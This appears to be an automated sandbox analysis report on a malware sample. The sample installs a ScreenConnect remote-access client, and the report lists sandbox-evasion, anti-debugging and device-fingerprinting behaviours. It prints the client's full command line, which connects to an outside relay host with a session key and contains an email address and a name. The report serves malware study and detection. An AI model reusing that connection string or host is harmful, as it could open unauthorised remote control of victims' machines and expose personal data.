Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Memory allocated: 1270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Memory allocated: 4C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Memory allocated: 6460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Memory allocated: 5BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Memory allocated: 7460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Memory allocated: 8460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Memory allocated: 86F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Memory allocated: 6460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Memory allocated: 96F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Memory allocated: 14F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Memory allocated: 2040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Memory allocated: 1E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: 2560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: 1A6A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: 1490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: 1AFA0000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI888B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI8C55.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe TID: 2728	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe TID: 6708	Thread sleep count: 223 > 30	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe TID: 2056	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: ScreenConnect.ClientService.exe, 00000008.00000002.3460563524.0000000004E10000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Anti Debugging

Enables debug privileges

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe

Memory allocated: page read and write | page guard

.NET source code references suspicious native API functions

HIPS / PFW / Operating System Protection Evasion

Source: 0.2.lat0Kwfbuj.exe.1350000.0.raw.unpack, Program.cs	Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsExtensions.cs	Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (20ae101cef0f1acf)\screenconnect.clientservice.exe" "?e=access&y=guest&h=lokistorage.xyz&p=8041&s=8c30d271-264f-488c-94af-041784a36368&k=bgiaaackaabsu0exaagaaaeaaqchadx0vdcoypzw3rhl2%2fwsmdfp2rmcowlbz1ecggd2oi1gruiacwzcrkszxbywgdfgxdbyoegqdwtpmoqlg8jof4zkxvyt9zhvvqib5ire7%2frfo81g3%2b6hxkpjc0inqs%2bxruwq1z%2b6smxqscbb%2fykhdhw7ahbhyk65snb5ak02%2bpswsu904ncqii1vfx60s4cj8ilr9kifjwymgg0rdnakscv6gau5odsv8wz3cfurc2fznj8a0fkfb5xyik39fbiivzp4vyfarunnluqwccrm3hrkoohc9g96dlui6y4avh5vyzfnxeaixqvrlqzjtpadrhivwzf5sgoywqiok%2bc5&t=michalgasper2%40gmail.com&c=kristof%20horvat&c=&c=&c=&c=&c=&c=&c="

Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Language, Device and Operating System Detection

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
